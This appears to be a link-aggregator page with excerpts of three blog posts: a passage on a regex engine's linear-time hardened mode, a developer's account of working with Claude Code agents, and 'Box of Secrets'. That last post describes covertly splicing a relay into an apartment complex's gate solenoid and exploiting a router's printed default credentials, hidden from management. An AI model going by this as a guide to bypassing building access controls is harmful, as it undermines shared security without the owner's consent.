two passes elim­i­nate the n restarts, but the for­ward pass it­self still re­solves one match at a time. patho­log­i­cal pat­terns with am­bigu­ous match bound­aries can cause qua­dratic work within that pass. i wanted a mode that guar­an­tees lin­ear time even on ad­ver­sar­ial in­put, no ex­cep­tions. so i added a hard­ened mode to the en­gine.

hard­ened mode re­places the for­ward pass with an O(n * S) scan (where S is the num­ber of si­mul­ta­ne­ously ac­tive DFA states) that re­solves all match end­ings in a sin­gle pass, re­turn­ing ex­actly the same left­most-longest matches with no se­man­tic trade­off. on patho­log­i­cal in­put (.*a|b against a haystack of b’s), the dif­fer­ence is dra­matic:
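the bench­mark is­n’t re­pro­duced here, but the qua­dratic half of the shape is easy to demo with a back­track­ing en­gine, which does the same per-po­si­tion rescan­ning on this in­put. a python sketch with il­lus­tra­tive sizes:

```python
import re
import time

def scan(n: int) -> float:
    """Time an all-matches scan of .*a|b over a haystack of n b's.

    At every position the .*a branch races to the end of the input
    looking for an 'a' that never comes, then the engine falls back to
    the one-byte 'b' branch: O(n) wasted work per position, O(n^2) total."""
    text = "b" * n
    start = time.perf_counter()
    count = sum(1 for _ in re.finditer(r".*a|b", text))
    assert count == n          # every 'b' ends up as its own match
    return time.perf_counter() - start

# quadrupling the input makes this roughly 16x slower, not 4x
print(f"n=4000: {scan(4000):.3f}s   n=16000: {scan(16000):.3f}s")
```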

nor­mal mode goes qua­dratic; hard­ened stays lin­ear. so why not make hard­ened the de­fault? i went back and forth on this.

the qua­dratic blowup re­quires a patho­log­i­cal pat­tern and a struc­tured in­put that’s long enough to cause a prob­lem. you need both halves. take a pat­tern like [A-Z][a-z]+: every match starts at an up­per­case let­ter and ends the mo­ment the en­gine sees some­thing that is­n’t low­er­case. there’s no am­bi­gu­ity about where a match ends, so the en­gine never res­cans the same in­put. for this pat­tern, the qua­dratic case is ac­tu­ally im­pos­si­ble. most real-world pat­terns share this prop­erty.

so im­pos­ing a 3-20x con­stant-fac­tor slow­down on every query to pro­tect against a case you’re un­likely to hit by ac­ci­dent felt wrong.

but if pat­terns are user-sup­plied, none of that holds. the at­tacker con­trols one half of the equa­tion and the com­pile time as well. “you prob­a­bly won’t hit it” is ex­actly the kind of rea­son­ing that leads to pro­duc­tion in­ci­dents. in the end i kept the fast path as the de­fault, mostly be­cause the slow­down is real and mea­sur­able on every sin­gle query, while the patho­log­i­cal case re­quires a gen­uinely hos­tile com­bi­na­tion.

there’s also a prac­ti­cal re­al­ity: i’m try­ing to show that RE# is the fastest regex en­gine for com­mon work­loads. if the de­fault path is 20% slower on com­mon bench­marks, that’s what peo­ple see, not the qua­dratic fix. i won’t have it.

hard­ened mode is there for when you’re ac­cept­ing pat­terns from the in­ter­net and can’t trust what you’re get­ting - an ex­plicit opt-in rather than a silent tax on every­one.

pat­terns with lookarounds are cur­rently re­jected in hard­ened mode. there’s no the­o­ret­i­cal bar­rier, but the im­ple­men­ta­tion needs some work.

RE#’s hard­ened mode ex­tends Aho-Corasick’s ap­proach to full regexes, where match lengths aren’t known in ad­vance. in­stead of a trie it holds a set of ac­tive match can­di­dates, ad­vanc­ing all of them on each in­put char­ac­ter us­ing de­riv­a­tives. new can­di­dates are only added at po­si­tions al­ready con­firmed as valid match be­gin­nings by the re­verse pass, so the en­gine never wastes work on po­si­tions that can’t start a match. the re­sult is the same prop­erty Aho-Corasick has al­ways had, lin­ear-time all-matches, but for regexes.
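de­riv­a­tives them­selves are sim­ple enough to sketch. this toy ver­sion keeps a list of live can­di­dates and ad­vances each one by a Brzozowski de­riv­a­tive per char­ac­ter. un­like the real hard­ened mode it seeds a can­di­date at every po­si­tion (there’s no re­verse pass here) and re­ports every longest end per start, but the ad­vanc­ing ma­chin­ery is the same idea:

```python
from dataclasses import dataclass

# tiny regex AST
@dataclass(frozen=True)
class Lit:
    ch: str

@dataclass(frozen=True)
class Cat:
    left: object
    right: object

@dataclass(frozen=True)
class Alt:
    left: object
    right: object

@dataclass(frozen=True)
class Star:
    node: object

EMPTY, EPS = object(), object()     # empty language / empty string

def nullable(r):
    """Can r match the empty string?"""
    if r is EPS or isinstance(r, Star):
        return True
    if r is EMPTY or isinstance(r, Lit):
        return False
    if isinstance(r, Cat):
        return nullable(r.left) and nullable(r.right)
    return nullable(r.left) or nullable(r.right)   # Alt

def cat(a, b):
    if a is EMPTY or b is EMPTY:
        return EMPTY
    if a is EPS:
        return b
    if b is EPS:
        return a
    return Cat(a, b)

def alt(a, b):
    if a is EMPTY:
        return b
    if b is EMPTY:
        return a
    return Alt(a, b)

def deriv(r, c):
    """Brzozowski derivative: the language of r after consuming c."""
    if r is EMPTY or r is EPS:
        return EMPTY
    if isinstance(r, Lit):
        return EPS if r.ch == c else EMPTY
    if isinstance(r, Alt):
        return alt(deriv(r.left, c), deriv(r.right, c))
    if isinstance(r, Cat):
        d = cat(deriv(r.left, c), r.right)
        return alt(d, deriv(r.right, c)) if nullable(r.left) else d
    return cat(deriv(r.node, c), r)                # Star

def longest_ends(r, text):
    """For each match start, the longest match end, via live candidates."""
    live, best = [], {}
    for i, c in enumerate(text):
        live.append((i, r))                        # a match may begin here
        nxt = []
        for start, res in live:
            res = deriv(res, c)
            if res is not EMPTY:
                nxt.append((start, res))
                if nullable(res):
                    best[start] = i + 1            # longest end so far
        live = nxt
    return sorted(best.items())

A_PLUS = Cat(Lit("a"), Star(Lit("a")))             # a+
print(longest_ends(A_PLUS, "baa"))                 # [(1, 3), (2, 3)]
```

dead can­di­dates (derivative = EMPTY) drop out im­me­di­ately, which is what keeps the live set small for pat­terns with un­am­bigu­ous bound­aries.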

so how does RE#’s nor­mal mode com­pare to Aho-Corasick on its home turf? here’s a bench­mark with a dic­tio­nary of 2663 words as a word1|word2|…|wordN al­ter­na­tion, matched against ~900KB of eng­lish prose - ex­actly the kind of work­load Aho-Corasick was de­signed for. RE# just com­piles it as a reg­u­lar regex:

how is this pos­si­ble when RE# is do­ing more work - two passes in­stead of one? it comes down to cache be­hav­ior. Aho-Corasick builds the full au­toma­ton up­front - for 2663 words that’s a large DFA with many states and un­pre­dictable jumps be­tween them, lead­ing to cache misses and branch mis­pre­dic­tions. rust regex uses a sin­gle lazily-com­piled DFA, which helps, but the state space for a large al­ter­na­tion is still sub­stan­tial. RE#’s de­riv­a­tive-based DFAs are lazily built and more com­pact - the two au­tomata (forward and re­verse) each have far fewer states than the equiv­a­lent full trie or NFA-based DFA, so tran­si­tions hit warm cache lines more of­ten.

RE# hard­ened is do­ing un­nec­es­sary work here - as with [A-Z][a-z]+ above, this pat­tern has un­am­bigu­ous match bound­aries, so hard­en­ing adds noth­ing. this loss is­n’t in­evitable. we can in­fer at com­pile time that hard­en­ing is­n’t needed for pat­terns like these, but there are higher pri­or­i­ties right now.

to be clear, for a smaller set of strings and a fully built au­toma­ton that fits com­fort­ably in L1 cache, Aho-Corasick would be the right choice - it only needs one pass while RE# scans twice. the re­sult above is spe­cific to large pat­terns where cache pres­sure mat­ters.

speak­ing of higher pri­or­i­ties - in the pre­vi­ous post i de­scribed how skip ac­cel­er­a­tion works and where RE# was los­ing to regex on lit­eral-heavy pat­terns. since then i’ve been clos­ing those gaps with hand-writ­ten AVX2 and NEON im­ple­men­ta­tions - rare byte search, teddy multi-po­si­tion match­ing, and range-based char­ac­ter class scan­ning.
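the rare-byte idea at least is easy to sketch out­side of SIMD land. in this python il­lus­tra­tion, str.find plays the role of the vec­tor­ized byte search, and the fre­quency table is made up:

```python
def skip_scan(text: str, literal: str, freq: dict) -> list:
    """Find a literal by jumping between occurrences of its rarest byte.

    freq maps characters to an assumed background frequency; str.find
    stands in for the vectorized (AVX2/NEON) byte search."""
    rare = min(literal, key=lambda ch: freq.get(ch, 0))
    off = literal.index(rare)          # where the rare byte sits in the literal
    hits, i = [], 0
    while True:
        p = text.find(rare, i)
        if p == -1:
            return hits
        start = p - off
        if start >= 0 and text.startswith(literal, start):
            hits.append(start)         # verify the full literal around the hit
        i = p + 1

english = {"h": 6, "e": 13, "l": 4, "o": 8, " ": 18, "m": 2, "c": 3, "r": 6}
print(skip_scan("hello memchr hello", "hello", english))   # [0, 13]
```

pick­ing the rarest byte means the vec­tor loop spends most of its time skip­ping and only rarely falls back to ver­i­fi­ca­tion.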

these used to be sig­nif­i­cant losses. clos­ing them was one of the more sat­is­fy­ing things to get work­ing. i was also ea­ger to see how RE# per­forms on re­bar, BurntSushi’s bench­mark suite for regex en­gines:

RE# does very well here now - most num­bers are within noise thresh­old of regex. the few dif­fer­ences here and there come down to byte fre­quency ta­bles and al­go­rith­mic choices in the skip loop. for con­text, a DFA by it­self gets you some­where near 1 GB/s. CPU vec­tor in­trin­sics can op­por­tunis­ti­cally push that to 40+ GB/s on pat­terns where most of the in­put can be skipped.

since RE# matches in re­verse, you might be won­der­ing whether it can work on streams:

any pat­tern + left­most-longest se­man­tics = no. this is­n’t an en­gine lim­i­ta­tion - it’s in­her­ent to the se­man­tics. if you ask for the longest match on an in­fi­nite stream, the an­swer might be “keep go­ing for­ever.” you might think left­most-greedy avoids this since it works left-to-right, but it does­n’t - .*a|b on a stream of b’s has the same prob­lem: the .*a branch keeps scan­ning for­ward look­ing for the last a that may never come.

pat­tern with an un­am­bigu­ous end bound­ary = yes. some pat­terns al­ready have un­am­bigu­ous bound­aries and work fine as-is. for the ones that don’t, in RE# you can in­ter­sect with a bound­ary - ^.*$ for lines, ~(_*\n\n_*) for para­graphs (where ~(…) is com­ple­ment and _* matches any string), or any de­lim­iter you want - and now the pat­tern is com­pat­i­ble with stream­ing. in the pre­vi­ous post i showed how you can in­ter­sect a regex with “valid utf-8”; here, you can in­ter­sect with “up to the next new­line” or “up to the end of the sec­tion”, even if the orig­i­nal pat­tern is user-sup­plied and does not have this prop­erty. it is a nice and gen­eral tech­nique.

any pat­tern + ear­li­est se­man­tics = yes. re­port a match the mo­ment the DFA en­ters a match state, no need to scan fur­ther. this is what Hyperscan does - it works on streams be­cause it never needs to look ahead.

the API does­n’t ex­pose a stream­ing in­ter­face yet - find­_all takes &[u8] - but chun­ked stream­ing is on the list.

worth be­ing up­front about the lim­i­ta­tions:

no cap­ture groups - RE# re­turns match bound­aries only, not sub-group cap­tures. this is­n’t im­pos­si­ble - cap­tures are a post-match op­er­a­tion that can be lay­ered on top. the rea­son is we haven’t found the right way to do it yet. with in­ter­sec­tion and com­ple­ment, every subex­pres­sion would naively be­come a cap­ture group - (a.*&.*b) has two im­plicit groups, and com­ple­ment cre­ates more. in tra­di­tional regex, (?:…) ex­ists to opt out of cap­tur­ing, but the more i think about it the more ?: feels like a his­tor­i­cal mis­take - it makes the de­fault be­hav­ior (capturing) the one that opts you into a much slower al­go­rithm, even when you don’t need it. i’d rather get the de­sign right than ship some­thing awk­ward.

in the mean­time, you can use an­other en­gine to ex­tract cap­tures post-match - with \A an­chors on the al­ready-known match bound­aries, the over­head is­n’t that bad.
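that work­flow looks roughly like this, with python’s re stand­ing in for the sec­ond en­gine and the span as­sumed to come from the bounds-only matcher:

```python
import re

def captures_for(pattern: str, text: str, span: tuple):
    """Extract capture groups for a match whose bounds are already known.

    The bounds-only engine found span; anchoring the pattern to the
    exact slice makes the second engine's job trivial."""
    start, end = span
    m = re.match(rf"\A(?:{pattern})\Z", text[start:end])
    return m.groups() if m else None

print(captures_for(r"(\w+)@(\w+)", "mail me: bob@example", (9, 20)))
# ('bob', 'example')
```

since the slice is known to be a match, the sec­ond en­gine never back­tracks across match bound­aries - it only has to carve up a string it al­ready knows is in the lan­guage.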

no lazy quan­ti­fiers - .*? is­n’t sup­ported. RE# uses left­most-longest (POSIX) se­man­tics, which is the math­e­mat­i­cally un­am­bigu­ous in­ter­pre­ta­tion. lazy quan­ti­fiers are a back­track­ing con­cept that does­n’t trans­late to this model.

cap­ture groups may come even­tu­ally, but lazy quan­ti­fiers are a de­lib­er­ate ar­chi­tec­tural choice. if you need cap­tures to­day, use regex. if you need the prop­er­ties RE# of­fers (boolean op­er­a­tors, lookarounds, true-lin­ear all-matches, POSIX se­man­tics), these lim­i­ta­tions are un­likely to mat­ter.

as a side note - to put RE#’s boolean op­er­a­tors to prac­ti­cal use, i built a grep tool called re. the main thing it adds over (rip)?grep is multi-term boolean search with scop­ing - re­quire mul­ti­ple pat­terns to co-oc­cur on the same line, para­graph, or within N lines of each other:

# unsafe code with unwrap co-located within 5 lines
re --near 5 -a unsafe -a unwrap src/

# list all files containing both serde and async
re --scope file -a serde -a async src/

you can also use full RE# pat­terns - re '([0-9a-f]+)&(_*[0-9]_*)&(_*[a-f]_*)' src/ finds hex strings con­tain­ing both a digit and a let­ter. you could do this with a pipeline of greps, but it’s one pass with all the con­text in­for­ma­tion pre­served.

it’s still early, but i’ve been us­ing it daily and i think there’s a lot of po­ten­tial here.

i think i’ll rest for a bit af­ter this. i can only do 80-hour weeks for so long, and even though i have a lot more to share, it’ll have to wait. there’s also a pa­per that’s been con­di­tion­ally ac­cepted at PLDI - i’ll write about it prop­erly once it’s out. the rust RE# it­self is­n’t quite ready for a for­mal 1.0 an­nounce­ment yet, but we’re get­ting closer.

...

Read the original on iev.ee »

9 247 shares, 10 trendiness

How I’m Productive with Claude Code

It’s been about 6 weeks since I joined Tano, and this is what my com­mit his­tory looks like:

Commits are a ter­ri­ble met­ric for out­put, but they’re the most vis­i­ble sig­nal I have. Something real changed in how I work, and the com­mit count is a side ef­fect.

So, what has changed?

When I joined Tano, I was mak­ing every pull re­quest by hand. Stage changes, write the com­mit mes­sage, craft the PR de­scrip­tion, push, cre­ate the PR on GitHub. A stan­dard process, and it was fine.

It took me a while to re­al­ize this is grunt work. I was so used to do­ing it that I’d never ques­tioned it.

That was the first real shift: I’m not the im­ple­menter any­more. I’m the man­ager of agents do­ing the im­ple­men­ta­tion. And man­agers au­to­mate their team’s grunt work.

Then I wrote my first Claude Code skill: /git-pr.

It does every­thing I used to do, ex­cept it does it bet­ter. The PR de­scrip­tions are more thor­ough than what I’d write, be­cause it reads the full diff and sum­marises the changes prop­erly. I’d got­ten so used to the drudgery that I’d stopped notic­ing it was drudgery.

The time saved mat­ters, but the real un­lock was the men­tal over­head re­moved. Every PR used to be a small con­text switch: stop think­ing about the code, start think­ing about how to de­scribe the code. Now I type /git-pr and move on to the next thing.

Reviewing changes had this an­noy­ing loop.

Preview changes lo­cally, go away from what I’m work­ing on, kill the dev server, restart it on the new branch, check it all works, re­view the code.

The server build took about a minute, which was ag­o­nis­ingly long when I was mid-con­text-switch. Long enough to break fo­cus, too short to do any­thing use­ful.

I switched the build to SWC, and server restarts dropped to un­der a sec­ond. This sparked joy.

It sounds like a small change. It was­n’t. Sub-second restarts mean you never leave the flow. Save a file, the server’s al­ready up, check the pre­view. There’s no gap where your at­ten­tion drifts. It’s the dif­fer­ence be­tween a con­ver­sa­tion with awk­ward pauses and one that flows nat­u­rally.

Before this, I checked every UI change. Preview lo­cally, eye­ball it, de­cide if it matches what I ex­pected. It worked, but it meant I was a bot­tle­neck on every fea­ture.

After the Chrome ex­ten­sion kept crash­ing, I switched to the pre­view fea­ture in Claude Code. It lets the agent set up a pre­view, per­sist ses­sion data, and see how the UI ac­tu­ally looks.

I wired it into the work­flow: a change is­n’t “done” un­til the agent has ver­i­fied the UI it­self. That meant I could del­e­gate ver­i­fi­ca­tion and only step in for fi­nal re­view — which also meant agents could run much longer with­out over­sight. They’d catch their own mis­takes. That mat­tered more than I re­al­ized at the time.

Fast re­builds and au­to­mated pre­views made an­other fric­tion vis­i­ble: I could only com­fort­ably work on one thing at a time.

I was re­view­ing PRs from other agents and team­mates. The work­flow was painful: check out the PR branch on main, re­build, test. But that would mess with my un­com­mit­ted changes. So I’d stash, check­out, re­build, test, switch back, pop the stash. Or cre­ate a work­tree man­u­ally, set it up, try to run the pre­view - only to find the ports clash­ing with my other run­ning server.

Our app has a fron­tend and a back­end, each need­ing its own port. Every work­tree shared the same en­vi­ron­ment vari­ables, so they’d all try to bind to the same ports. Running two things at once was a fight.

I built a sys­tem around this. Whenever a work­tree is cre­ated, every server gets as­signed ports from a unique range. No col­li­sions. I could run ten pre­views si­mul­ta­ne­ously if I wanted.
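The post does­n’t say how the as­sign­ment works, but one sim­ple way to get unique, sta­ble ranges is to hash the work­tree path — every name and num­ber below is hy­po­thet­i­cal:

```python
import hashlib

def ports_for(worktree_path: str, base: int = 20000, span: int = 10) -> range:
    """Map a worktree path to its own block of ports, deterministically.

    Hypothetical sketch: frontend takes the first port, backend the
    second, and so on. Distinct paths can still collide (only 1000
    buckets here), so a real system would track assignments on disk."""
    digest = hashlib.sha256(worktree_path.encode()).hexdigest()
    bucket = int(digest, 16) % 1000
    start = base + bucket * span
    return range(start, start + span)

frontend, backend = ports_for("~/worktrees/feature-x")[:2]
```

The useful prop­erty is de­ter­min­ism: restart­ing a work­tree’s servers al­ways lands them back on the same ports, so pre­views and book­marks keep work­ing.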

I went from get­ting over­whelmed by two par­al­lel branches to run­ning five work­trees at once. My cre­ate loop changed: fire off mul­ti­ple agents on sep­a­rate work­trees, each build­ing a dif­fer­ent fea­ture. They’d only stop once they’d ver­i­fied the UI them­selves.

I’d be heav­ily in­volved in plan­ning. Then I’d dis­ap­pear un­til code re­view. Agents catch­ing their own mis­takes mat­tered a lot more with five run­ning at once.

Reviewing got smoother too. No faffing around with setup. No re­build­ing. No port con­flicts. Just: read, ver­ify, merge. Next.

My role has changed. I used to de­rive joy from fig­ur­ing out a com­pli­cated prob­lem, spend­ing hours craft­ing the per­fect UI. I still do that some­times, but a lot less now. What’s be­come more fun is build­ing the in­fra­struc­ture that makes the agents ef­fec­tive. Being a man­ager of a team of ten ver­sus be­ing a solo dev. And like any good man­ager, you get to claim credit for all the work your “team” does.

These aren’t glam­orous prob­lems. They’re plumb­ing. But plumb­ing de­ter­mines whether you’re in flow or wrestling your en­vi­ron­ment.

The high­est-lever­age work I’ve done at Tano has­n’t been writ­ing fea­tures. It’s been build­ing the in­fra­struc­ture that turned a trickle of com­mits into a flood.

Each of these stages re­moved a dif­fer­ent kind of fric­tion:

/git-pr re­moved the fric­tion of for­mat­ting - turn­ing code changes into a pre­sentable PR.

SWC re­moved the fric­tion of wait­ing - the dead time be­tween mak­ing a change and see­ing it.

The pre­view re­moved the fric­tion of ver­i­fy­ing changes - I could quickly see what’s hap­pen­ing.

The work­tree sys­tem re­moved the fric­tion of con­text-switch­ing - jug­gling mul­ti­ple streams of work with­out them col­lid­ing.

And each time I re­moved one, the next be­came vis­i­ble. When PRs were ef­fort­less, I no­ticed I was wast­ing time on re­builds. When re­builds were in­stant, I no­ticed I could­n’t run things in par­al­lel. Classic the­ory of con­straints — fix one, and the sys­tem im­me­di­ately shows you the next one.

The na­ture of the work changed. I’m not “using a tool that writes code.” I’m in a tight loop: kick off a task, the agent writes code, I check the pre­view, read the diff, give feed­back or merge, kick off the next task. The feed­back loop is so tight that there’s no gap for my at­ten­tion to leak out.

Building things is a dif­fer­ent kind of fun now — it’s so fast that the game be­comes im­prov­ing the speed. How much faster can I go? When the loop is tight enough, en­gi­neer­ing be­comes the en­ter­tain­ment.

...

Read the original on neilkakkar.com »

10 244 shares, 17 trendiness

Box of Secrets

My friend Frank (not his real name) hosts a lot of guests at his apart­ment, and his com­plex’s in­ter­com is what ush­ers them in­side. You’ve prob­a­bly seen them be­fore, they look like this:

Up un­til re­cently, guests could find Frank’s num­ber in the sys­tem and give it a call. If Frank rec­og­nized the peo­ple on the line, he would press a num­ber on his dial pad, which the con­troller would in­ter­pret as a sig­nal to un­lock the gate.

Then, man­age­ment got lazy. The com­plex Frank lives in failed to re­new their in­ter­com’s cel­lu­lar ser­vice, so it could no longer make calls for the voice sys­tem. Even af­ter months of ask­ing his land­lord to fix it, noth­ing was done.

My other friend Hazel and I ar­rived to visit Frank dur­ing this out­age pe­riod, and he asked us to see what we could do. Here’s what we saw:

We in­spected the top box more closely, with a promis­ing re­sult: it was un­locked! The gen­eral lay­out of the box is as fol­lows:

It was im­pos­si­ble to ig­nore the mas­sive Wi-Fi/cell router in the top cor­ner with its ad­min pass­word printed right on it (not pic­tured). Of course, I had to in­ves­ti­gate.

I quickly found the net­work and en­tered the lo­gin cre­den­tials shown. Of course, they weren’t changed from the de­faults. I had full ad­min ac­cess to the router, which was awe­some, un­til I re­al­ized that I could­n’t do very much with its ba­sic, locked-down in­ter­face. This al­most ended my ex­plo­ration, but then I re­al­ized: what about SSH?

AT&T, the com­pany that makes the routers for Doorking, is smarter than a bag of rocks in that SSH is pro­tected on their router. Sadly for them, they lose to the bag of rocks in pro­vid­ing a way to down­load their en­tire sys­tem con­fig­u­ra­tion from the web in­ter­face, con­tain­ing a way to re­set the root pass­word to what­ever you want:

# This file is an exported configuration from NetComm Bovine platform based device.
# Private fields are encrypted but any configuraiton entry can be manually replaced by
# a plain-text variable or URI-encoded text.
admin.firewall.enable;1
admin.local.enable_http;1
admin.local.enable_https;1
admin.local.ssh_enable;1
admin.local.telnetenable;1
admin.open.port;
admin.password;
admin.user.admin;$aM9VdmCoc5vuekVU70/Gl8iJTOujxMQo
admin.user.root;$DDDgp0GJy6nB29UX7pDlrUUKDkWYqp84

Wow. I now see why router vul­ner­a­bil­i­ties are so com­mon.

This was cer­tainly a promis­ing av­enue, but we re­al­ized some­thing: even if we gained code ex­e­cu­tion on the router, we would have to fig­ure out its cus­tom se­r­ial pro­to­col to even have a chance at talk­ing to the main con­trol box. This was­n’t some­thing Hazel and I wanted to spend our en­tire va­ca­tion do­ing, so we de­cided to look else­where.

Looking at the other ter­mi­nals within the box, we saw the PH LINE phone con­nec­tors for each sys­tem. This was promis­ing, since Frank’s ex­ist­ing in­ter­com sys­tem used DTMF sig­nals to open the gate back when it was work­ing.

However, it was un­likely that the main con­trol box would blindly ac­cept any phone com­mands while not ac­tively lis­ten­ing for them af­ter a user had asked it to. It would’ve been pos­si­ble to test this hy­poth­e­sis, but we were again left with the re­al­ity of ex­tremely lim­ited de­bug­ging ca­pa­bil­i­ties, in ad­di­tion to min­i­mal knowl­edge of phone sig­nal­ing sys­tems.

Hazel and I knew there had to be some vul­ner­a­bil­ity in the sys­tem that would al­low us to in­ject our own com­mands into the gate con­trol sys­tem. We were cor­rect, but we first needed a change in per­spec­tive. Our ini­tial as­sump­tion was that we needed to take top-down con­trol over the sys­tem to make it do what we wanted. After our pre­vi­ous fail­ures to do so, we changed our goal to take bot­tom-up con­trol of the sys­tem: un­der­min­ing it at its core.

We ex­panded our search past the voice box to the main junc­tion box that routed the wires be­tween the voice box and the (inaccessible) main con­troller. After un­screw­ing two flat­head screws, we were met with an in­ter­est­ing sur­prise: an ex­tra ca­ble we did­n’t ex­pect. Tracing the ca­ble led to a rev­e­la­tion: the main con­trol box con­trols the so­le­noid, the me­chan­i­cal de­vice re­spon­si­ble for un­lock­ing the gate, through the junc­tion box!

Having ac­cess to the so­le­noid con­trol wire changed our ap­proach dra­mat­i­cally. Solenoids are just elec­tro­mag­nets that have two states: un­pow­ered (locked) and pow­ered (unlocked); no se­cu­rity mea­sures, no pro­to­cols to snoop. With this easy ac­cess point, we could just ap­ply our own power to the so­le­noid to un­lock the gate. In ad­di­tion, the 12 volt DC aux­il­iary power from a ter­mi­nal in the voice box would be per­fect to power a mi­cro­con­troller.

Here is the plan we came up with:

* Split the wire that runs to the lock hous­ing and trig­gers the so­le­noid. Connect the split end to a Wi-Fi-enabled ESP32 re­lay board.

* Write firmware in Rust to turn the ESP32 into a Matter client that we can con­nect to Frank’s Apple Home.

* Hide the board in­side the lit­tle junc­tion box, con­ve­niently placed there by the build­ing for max­i­mum dis­creet­ness.

* Power the board by plug­ging a power ca­ble into the Doorking voice box and run­ning the ca­ble into the junc­tion.

It was time to or­der parts. Thankfully Hazel found an ESP32 re­lay board that did ex­actly what we wanted, hav­ing two re­lays to con­trol the so­le­noid. The cir­cuit ended up look­ing like this:

This setup en­sures that if our cir­cuit were to fail, the sys­tem would still re­main fully func­tional since the gate con­trol com­mands are passed through when no power is ap­plied to the re­lay.1

Once we had the hard­ware set, next up was the soft­ware. We chose to use a Matter li­brary writ­ten in Rust with spe­cial­iza­tions for the ESP32. This would al­low us to use an open stan­dard (with freely ac­ces­si­ble specs, no file­type:pdf dig­ging nec­es­sary!) to con­nect to Frank’s Apple Home setup.

The soft­ware can be de­scribed by this state ma­chine:

It’s pretty sim­ple. Startup and con­nect to the net­work. Once con­nected, start lis­ten­ing for com­mands from the home. When in­structed, un­lock the gate for a cer­tain amount of time (user con­fig­urable with a de­fault time of ten sec­onds), then re-lock the gate. Importantly, the soft­ware will never let the gate stay un­locked in­def­i­nitely, en­sur­ing the sys­tem re­mains se­cure. You can look at the code your­self here.

One par­tic­u­larly in­fu­ri­at­ing is­sue we en­coun­tered dur­ing de­vel­op­ment was the ESP32’s very lim­ited RAM. Launching both the Wi-Fi and Bluetooth stacks to­gether would al­most al­ways cause mem­ory cor­rup­tion due to over­al­lo­ca­tion, lead­ing to a hard re­set af­ter an in­valid mem­ory ac­cess. The Matter im­ple­men­ta­tion we used re­lied on the ESP32’s older Bluedroid Bluetooth stack in­stead of the newer NimBLE, mak­ing the prob­lem even worse. After man­u­ally tweak­ing the size of the stack for a long time, even with the help of Claude Code we were un­able to get it sta­ble. However, there was a so­lu­tion in store: only en­able ei­ther Wi-Fi or Bluetooth, and have Claude dump a bunch of mem­ory-sav­ing con­fig set­tings into sdkconfig.defaults. Bluetooth is only nec­es­sary for the pro­vi­sion­ing process, and Wi-Fi is only nec­es­sary for reg­u­lar op­er­a­tion. There is a small win­dow dur­ing the pro­vi­sion­ing process where both need to be ac­tive, but this is short enough to not cause prob­lems. Now, in nor­mal op­er­a­tion the ESP32 im­me­di­ately dis­ables Bluetooth, elim­i­nat­ing the prob­lem.

Once we han­dled all of the edge cases, the de­vice showed up in Apple Home!

Fun fact, you can set the man­u­fac­turer in­for­ma­tion to what­ever you’d like:

Once we had the soft­ware run­ning per­fectly, we moved on to de­ploy­ing the de­vice. Luckily, the board we bought fit per­fectly into the small junc­tion box that started us down this path, so it would be com­pletely in­vis­i­ble to any­one who passed by. Hazel had al­ready run power lines from the voice box to the junc­tion box, and we had al­ready pur­chased a Wi-Fi ex­ten­der to en­sure the sig­nal was strong, so all we needed to do was hook things in. After a lot of care­ful splic­ing by Hazel, it was in­stalled! We con­nected power in the voice box, aaaaannnnnnd­ddddd… noth­ing. No power.

This was bad. Something had bucked our ex­pec­ta­tions, but we had no idea what. Frank did­n’t have a mul­ti­me­ter, so we were stuck try­ing to fig­ure out if there was a fray in the power wire, or if there was maybe a blown com­po­nent on our board, or any num­ber of other po­ten­tial prob­lems. Eventually I got an idea: Frank owns a cord­less drill. After rum­mag­ing around in his tool closet, I found what I was look­ing for: a cord­less drill bat­tery, rated to out­put 20 volts. I ran down­stairs, con­nected it to the power wires, and eu­reka! It worked! The board fired up and con­nected to Apple Home. This was a wild feel­ing, be­ing able to un­lock the gate be­fore I even got to it.

While it felt re­ally good to know that the pro­ject could work, we needed to fig­ure out what was go­ing on with the power. After some dig­ging I came across the ser­vice man­ual for the voice box, and I found some­thing that should’ve been ob­vi­ous: the 12 volt aux port was an in­put, not an out­put, for power sources such as so­lar pan­els. It was frus­trat­ing for us to dis­cover this fact, but at least our board was func­tional. After a quick search I or­dered a rec­ti­fy­ing reg­u­la­tor that con­verts the 18 volt AC in­put to 12 volts DC. Shipping took for­ever, but once it ar­rived it fit right in along­side the ESP32 board in­side the junc­tion box. I con­nected it to the known-work­ing AC power for the voice box, and power started flow­ing! We closed every­thing up, and we were done.

Hazel and I are su­per proud of our lit­tle box of se­crets, and Frank could­n’t be hap­pier. With his new­found ca­pa­bil­ity to un­lock the gate through Apple Home,

* Frank can un­lock the build­ing gate for him­self with an easy tap on his phone, or re­motely let guests in again with­out the in­ter­com.

* Frank’s Home guests can now un­lock both the build­ing gate and his apart­men­t’s smart lock from the Home app; it’s now an all-in-one way for them to eas­ily en­ter his apart­ment.

As a bonus, the as­sem­bly is very dis­creet: it’s just one ESP32 and a small power de­vice hid­den in a screw-se­cured junc­tion box that does­n’t in­ter­fere with the build­ing’s pri­mary ac­cess con­trol sys­tem, giv­ing it a much bet­ter chance of avoid­ing dis­cov­ery.

This was such a fun pro­ject to work on, and it al­lowed me to dip my toes into cir­cuit hack­ing, some­thing I don’t get to do nearly enough. The com­po­nents for this pro­ject are all su­per sim­ple, so if you’re in the same po­si­tion as Frank, give it a try! Tag me on Twitter if you get it work­ing!

...

Read the original on jackhogan.me »
